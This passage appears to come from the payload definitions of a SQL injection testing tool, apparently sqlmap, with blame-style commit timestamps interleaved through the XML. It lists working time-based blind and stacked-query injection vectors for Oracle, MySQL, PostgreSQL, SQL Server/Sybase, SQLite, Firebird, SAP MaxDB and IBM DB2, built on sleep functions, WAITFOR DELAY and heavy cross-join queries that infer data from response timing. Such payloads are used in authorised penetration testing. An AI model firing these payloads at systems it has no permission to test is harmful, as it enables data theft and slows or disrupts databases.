2011-03-08 17:29:22 +03:00
<payload > ; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL;</payload>
2010-11-28 21:10:54 +03:00
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
2010-12-09 18:24:48 +03:00
<title > Oracle stacked queries (heavy query)</title>
2010-11-28 21:10:54 +03:00
<stype > 4</stype>
<level > 5</level>
2011-01-19 01:55:20 +03:00
<risk > 2</risk>
2010-11-28 21:10:54 +03:00
<clause > 0</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > ; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL;</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > ; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5;</payload>
2010-11-28 21:10:54 +03:00
<comment > --</comment>
</request>
<response >
2010-12-09 18:24:48 +03:00
<time > [DELAYED]</time>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
2011-01-16 13:07:56 +03:00
<test >
<title > Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
<stype > 4</stype>
<level > 5</level>
<risk > 0</risk>
<clause > 0</clause>
<where > 1</where>
<vector > ; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
<request >
<payload > ; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END;</payload>
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
2011-01-16 13:31:16 +03:00
<test >
<title > Oracle stacked queries (USER_LOCK.SLEEP)</title>
<stype > 4</stype>
<level > 5</level>
<risk > 0</risk>
<clause > 0</clause>
<where > 1</where>
<vector > ; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END;</vector>
<request >
<payload > ; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END;</payload>
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
2010-11-28 21:10:54 +03:00
<test >
2010-12-07 15:45:45 +03:00
<title > SQLite > 2.0 stacked queries (heavy query)</title>
2010-11-28 21:10:54 +03:00
<stype > 4</stype>
<level > 3</level>
2011-01-19 01:55:20 +03:00
<risk > 2</risk>
2010-11-28 21:10:54 +03:00
<clause > 0</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > ; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END);</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > ; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))));</payload>
2010-11-28 21:10:54 +03:00
<comment > --</comment>
</request>
<response >
2010-12-07 03:27:26 +03:00
<time > [DELAYED]</time>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > SQLite</dbms>
<dbms_version > > 2.0</dbms_version>
</details>
</test>
<test >
2010-12-07 15:45:45 +03:00
<title > Firebird stacked queries (heavy query)</title>
2010-11-28 21:10:54 +03:00
<stype > 4</stype>
<level > 3</level>
2011-01-19 01:55:20 +03:00
<risk > 2</risk>
2010-11-28 21:10:54 +03:00
<clause > 0</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > ; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3),[RANDNUM]) FROM RDB$DATABASE;</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > ; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3;</payload>
2010-11-28 21:10:54 +03:00
<comment > --</comment>
</request>
<response >
2010-12-07 03:27:26 +03:00
<time > [DELAYED]</time>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > Firebird</dbms>
2010-12-11 14:03:32 +03:00
<dbms_version > > = 2.0</dbms_version>
2010-11-28 21:10:54 +03:00
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
<!-- End of stacked queries tests -->
<!-- AND time - based blind tests -->
<test >
<title > MySQL > 5.0.11 AND time-based blind</title>
<stype > 5</stype>
<level > 1</level>
<risk > 1</risk>
2010-12-03 15:00:03 +03:00
<clause > 1,2,3</clause>
2010-11-28 21:10:54 +03:00
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
2010-11-28 21:10:54 +03:00
<request >
<payload > AND SLEEP([SLEEPTIME])</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > 5.0.11</dbms_version>
</details>
</test>
2011-01-12 19:20:29 +03:00
<test >
<title > MySQL > 5.0.11 AND time-based blind (comment)</title>
<stype > 5</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
2011-01-12 19:20:29 +03:00
<request >
<payload > AND SLEEP([SLEEPTIME])</payload>
2011-11-24 02:57:02 +04:00
<comment > #</comment>
2011-01-12 19:20:29 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > 5.0.11</dbms_version>
</details>
</test>
2010-11-28 21:10:54 +03:00
<test >
2010-12-07 15:45:45 +03:00
<title > MySQL < 5.0.12 AND time-based blind (heavy query)</title>
2010-11-28 21:10:54 +03:00
<stype > 5</stype>
<level > 2</level>
2011-01-19 01:55:20 +03:00
<risk > 2</risk>
2010-12-03 15:00:03 +03:00
<clause > 1,2,3</clause>
2010-11-28 21:10:54 +03:00
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-07 03:27:26 +03:00
<time > [DELAYED]</time>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2011-01-12 19:20:29 +03:00
<test >
<title > MySQL < 5.0.12 AND time-based blind (heavy query - comment)</title>
<stype > 5</stype>
<level > 5</level>
2011-01-19 01:55:20 +03:00
<risk > 2</risk>
2011-01-12 19:20:29 +03:00
<clause > 1,2,3</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
2011-01-12 19:20:29 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
2011-11-24 02:57:02 +04:00
<comment > #</comment>
2011-01-12 19:20:29 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2010-12-09 02:52:31 +03:00
<test >
<title > PostgreSQL > 8.1 AND time-based blind</title>
<stype > 5</stype>
2011-01-18 23:32:49 +03:00
<level > 1</level>
2010-12-09 02:52:31 +03:00
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 1</where>
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request >
<payload > AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
<dbms_version > > 8.1</dbms_version>
</details>
</test>
2011-01-12 19:20:29 +03:00
<test >
<title > PostgreSQL > 8.1 AND time-based blind (comment)</title>
<stype > 5</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 1</where>
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request >
<payload > AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
<dbms_version > > 8.1</dbms_version>
</details>
</test>
2010-12-07 02:05:53 +03:00
<test >
2010-12-07 15:45:45 +03:00
<title > PostgreSQL AND time-based blind (heavy query)</title>
2010-12-07 02:05:53 +03:00
<stype > 5</stype>
2010-12-09 02:52:31 +03:00
<level > 3</level>
2011-01-19 01:55:20 +03:00
<risk > 2</risk>
2010-12-07 02:05:53 +03:00
<clause > 1,2,3</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
2010-12-07 02:05:53 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
2010-12-07 02:05:53 +03:00
</request>
<response >
2010-12-07 15:45:45 +03:00
<time > [DELAYED]</time>
2010-12-07 02:05:53 +03:00
</response>
<details >
2010-12-07 15:45:45 +03:00
<dbms > PostgreSQL</dbms>
2010-12-07 02:05:53 +03:00
</details>
</test>
2011-01-12 19:20:29 +03:00
<test >
<title > PostgreSQL AND time-based blind (heavy query - comment)</title>
<stype > 5</stype>
<level > 5</level>
2011-01-19 01:55:20 +03:00
<risk > 2</risk>
2011-01-12 19:20:29 +03:00
<clause > 1,2,3</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
2011-01-12 19:20:29 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
2011-01-12 19:20:29 +03:00
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
2011-01-18 05:05:18 +03:00
<test >
2011-01-19 01:55:20 +03:00
<title > Microsoft SQL Server/Sybase time-based blind</title>
2011-01-18 05:05:18 +03:00
<stype > 5</stype>
<level > 1</level>
<risk > 0</risk>
<clause > 0</clause>
<where > 1</where>
<vector > IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
<request >
<payload > WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
2011-02-14 00:20:21 +03:00
<dbms > Sybase</dbms>
2011-01-21 00:42:55 +03:00
<os > Windows</os>
2011-01-18 05:05:18 +03:00
</details>
</test>
2010-12-07 00:20:26 +03:00
<test >
2010-12-07 15:45:45 +03:00
<title > Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>
2010-12-07 00:20:26 +03:00
<stype > 5</stype>
2010-12-07 03:51:14 +03:00
<level > 2</level>
2011-01-19 01:55:20 +03:00
<risk > 2</risk>
2010-12-07 00:20:26 +03:00
<clause > 1,2,3</clause>
<where > 1</where>
2012-01-10 15:50:26 +04:00
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
2010-12-06 22:11:05 +03:00
<request >
2012-01-10 15:50:26 +04:00
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
2010-12-06 22:11:05 +03:00
</request>
<response >
2010-12-07 03:27:26 +03:00
<time > [DELAYED]</time>
2010-12-06 22:11:05 +03:00
</response>
<details >
2010-12-07 15:45:45 +03:00
<dbms > Microsoft SQL Server</dbms>
2011-02-14 00:20:21 +03:00
<dbms > Sybase</dbms>
2011-01-21 00:42:55 +03:00
<os > Windows</os>
2010-12-06 22:11:05 +03:00
</details>
</test>
2011-01-12 19:20:29 +03:00
<test >
<title > Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)</title>
<stype > 5</stype>
<level > 5</level>
2011-01-19 01:55:20 +03:00
<risk > 2</risk>
2011-01-12 19:20:29 +03:00
<clause > 1,2,3</clause>
<where > 1</where>
2012-01-10 15:50:26 +04:00
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
2011-01-12 19:20:29 +03:00
<request >
2012-01-10 15:50:26 +04:00
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
2011-01-12 19:20:29 +03:00
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
2011-02-14 00:20:21 +03:00
<dbms > Sybase</dbms>
2011-01-21 00:42:55 +03:00
<os > Windows</os>
2011-01-12 19:20:29 +03:00
</details>
</test>
2010-12-07 03:51:14 +03:00
<test >
2010-12-07 15:45:45 +03:00
<title > Oracle AND time-based blind</title>
2010-12-07 03:51:14 +03:00
<stype > 5</stype>
<level > 1</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 1</where>
2010-12-07 15:45:45 +03:00
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
2010-12-07 03:51:14 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
2010-12-07 03:51:14 +03:00
</request>
<response >
2010-12-07 15:45:45 +03:00
<time > [SLEEPTIME]</time>
2010-12-07 03:51:14 +03:00
</response>
<details >
2010-12-07 15:45:45 +03:00
<dbms > Oracle</dbms>
2010-12-07 03:51:14 +03:00
</details>
</test>
2011-01-12 19:20:29 +03:00
<test >
<title > Oracle AND time-based blind (comment)</title>
<stype > 5</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3</clause>
<where > 1</where>
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
<request >
2011-03-08 17:29:22 +03:00
<payload > AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
2011-01-12 19:20:29 +03:00
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
2010-12-06 22:11:05 +03:00
<test >
2010-12-07 15:45:45 +03:00
<title > Oracle AND time-based blind (heavy query)</title>
2010-12-06 22:11:05 +03:00
<stype > 5</stype>
<level > 2</level>
2011-01-19 01:55:20 +03:00
<risk > 2</risk>
2010-12-06 22:11:05 +03:00
<clause > 1,2,3</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
2010-12-06 22:11:05 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
2010-12-06 22:11:05 +03:00
</request>
<response >
2010-12-07 03:27:26 +03:00
<time > [DELAYED]</time>
2010-12-06 22:11:05 +03:00
</response>
<details >
2010-12-07 15:45:45 +03:00
<dbms > Oracle</dbms>
2010-12-06 22:11:05 +03:00
</details>
</test>
2011-01-12 19:20:29 +03:00
<test >
<title > Oracle AND time-based blind (heavy query - comment)</title>
<stype > 5</stype>
<level > 5</level>
2011-01-19 01:55:20 +03:00
<risk > 2</risk>
2011-01-12 19:20:29 +03:00
<clause > 1,2,3</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
2011-01-12 19:20:29 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
2011-01-12 19:20:29 +03:00
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
2010-12-06 22:11:05 +03:00
<test >
2010-12-07 15:45:45 +03:00
<title > SQLite > 2.0 AND time-based blind (heavy query)</title>
2010-11-28 21:10:54 +03:00
<stype > 5</stype>
<level > 3</level>
2011-01-19 01:55:20 +03:00
<risk > 2</risk>
2010-11-28 21:10:54 +03:00
<clause > 1</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END)</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-07 03:27:26 +03:00
<time > [DELAYED]</time>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > SQLite</dbms>
<dbms_version > > 2.0</dbms_version>
</details>
</test>
2011-01-12 19:20:29 +03:00
<test >
<title > SQLite > 2.0 AND time-based blind (heavy query - comment)</title>
<stype > 5</stype>
<level > 5</level>
2011-01-19 01:55:20 +03:00
<risk > 2</risk>
2011-01-12 19:20:29 +03:00
<clause > 1</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END)</vector>
2011-01-12 19:20:29 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))</payload>
2011-01-12 19:20:29 +03:00
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > SQLite</dbms>
<dbms_version > > 2.0</dbms_version>
</details>
</test>
2010-11-28 21:10:54 +03:00
<test >
2010-12-06 22:11:05 +03:00
<title > Firebird AND time-based blind (heavy query)</title>
2010-11-28 21:10:54 +03:00
<stype > 5</stype>
<level > 4</level>
2011-01-19 01:55:20 +03:00
<risk > 2</risk>
2010-11-28 21:10:54 +03:00
<clause > 1</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3),[RANDNUM])</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3)</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-07 03:27:26 +03:00
<time > [DELAYED]</time>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > Firebird</dbms>
2010-12-11 14:03:32 +03:00
<dbms_version > > = 2.0</dbms_version>
2010-11-28 21:10:54 +03:00
</details>
</test>
2011-01-12 19:20:29 +03:00
<test >
<title > Firebird AND time-based blind (heavy query - comment)</title>
<stype > 5</stype>
<level > 5</level>
2011-01-19 01:55:20 +03:00
<risk > 2</risk>
2011-01-12 19:20:29 +03:00
<clause > 1</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3),[RANDNUM])</vector>
2011-01-12 19:20:29 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3)</payload>
2011-01-12 19:20:29 +03:00
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Firebird</dbms>
<dbms_version > > = 2.0</dbms_version>
</details>
</test>
2011-06-26 20:38:22 +04:00
2011-06-27 03:46:09 +04:00
<test >
<title > SAP MaxDB AND time-based blind (heavy query)</title>
<stype > 5</stype>
<level > 3</level>
<risk > 2</risk>
<clause > 1,2,3</clause>
<where > 1</where>
<vector > AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1, (SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2, (SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request >
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1, DOMAIN.COLUMNS AS T2, DOMAIN.TABLES AS T3)</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > SAP MaxDB</dbms>
</details>
</test>
<test >
<title > SAP MaxDB AND time-based blind (heavy query - comment)</title>
<stype > 5</stype>
<level > 5</level>
<risk > 2</risk>
<clause > 1,2,3</clause>
<where > 1</where>
<vector > AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1, (SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2, (SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request >
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1, DOMAIN.COLUMNS AS T2, DOMAIN.TABLES AS T3)</payload>
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > SAP MaxDB</dbms>
</details>
</test>
2011-06-26 20:38:22 +04:00
<test >
2011-06-27 12:58:59 +04:00
<title > IBM DB2 AND time-based blind (heavy query)</title>
2011-06-26 20:38:22 +04:00
<stype > 5</stype>
2011-06-27 03:46:09 +04:00
<level > 3</level>
2011-06-26 20:38:22 +04:00
<risk > 2</risk>
<clause > 1,2,3</clause>
<where > 1</where>
<vector > AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request >
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2011-06-27 12:58:59 +04:00
<dbms > IBM DB2</dbms>
2011-06-26 20:38:22 +04:00
</details>
</test>
<test >
2011-06-27 12:58:59 +04:00
<title > IBM DB2 AND time-based blind (heavy query - comment)</title>
2011-06-26 20:38:22 +04:00
<stype > 5</stype>
<level > 5</level>
<risk > 2</risk>
<clause > 1,2,3</clause>
<where > 1</where>
<vector > AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request >
<payload > AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2011-06-27 12:58:59 +04:00
<dbms > IBM DB2</dbms>
2011-06-26 20:38:22 +04:00
</details>
</test>
2011-06-27 03:46:09 +04:00
<!-- TODO: if possible, add payload for Microsoft Access -->
2010-11-28 21:10:54 +03:00
<!-- End of AND time - based blind tests -->
<!-- OR time - based blind tests -->
<test >
<title > MySQL > 5.0.11 OR time-based blind</title>
<stype > 5</stype>
<level > 2</level>
<risk > 3</risk>
2010-12-03 15:00:03 +03:00
<clause > 1,2,3</clause>
2010-12-05 15:23:18 +03:00
<where > 2</where>
2011-03-08 17:29:22 +03:00
<vector > OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
2010-11-28 21:10:54 +03:00
<request >
2010-12-09 02:52:31 +03:00
<payload > OR [RANDNUM]=SLEEP([SLEEPTIME])</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > 5.0.11</dbms_version>
</details>
</test>
<test >
2010-12-07 15:45:45 +03:00
<title > MySQL < 5.0.12 OR time-based blind (heavy query)</title>
2010-11-28 21:10:54 +03:00
<stype > 5</stype>
2010-12-09 02:52:31 +03:00
<level > 4</level>
2010-11-28 21:10:54 +03:00
<risk > 3</risk>
2010-12-03 15:00:03 +03:00
<clause > 1,2,3</clause>
2010-12-05 15:23:18 +03:00
<where > 2</where>
2011-03-08 17:29:22 +03:00
<vector > OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-07 03:27:26 +03:00
<time > [DELAYED]</time>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2010-12-07 16:24:18 +03:00
2010-12-07 02:05:53 +03:00
<test >
2010-12-09 02:52:31 +03:00
<title > PostgreSQL > 8.1 OR time-based blind</title>
2010-12-07 02:05:53 +03:00
<stype > 5</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1,2,3</clause>
<where > 2</where>
2010-12-09 02:52:31 +03:00
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request >
<payload > OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
<dbms_version > > 8.1</dbms_version>
</details>
</test>
<test >
<title > PostgreSQL OR time-based blind (heavy query)</title>
<stype > 5</stype>
<level > 4</level>
<risk > 3</risk>
<clause > 1,2,3</clause>
<where > 2</where>
2011-03-08 17:29:22 +03:00
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
2010-12-07 02:05:53 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
2010-12-07 02:05:53 +03:00
</request>
<response >
2010-12-07 15:45:45 +03:00
<time > [DELAYED]</time>
2010-12-07 02:05:53 +03:00
</response>
<details >
2010-12-07 15:45:45 +03:00
<dbms > PostgreSQL</dbms>
2010-12-07 02:05:53 +03:00
</details>
</test>
2010-11-28 21:10:54 +03:00
<test >
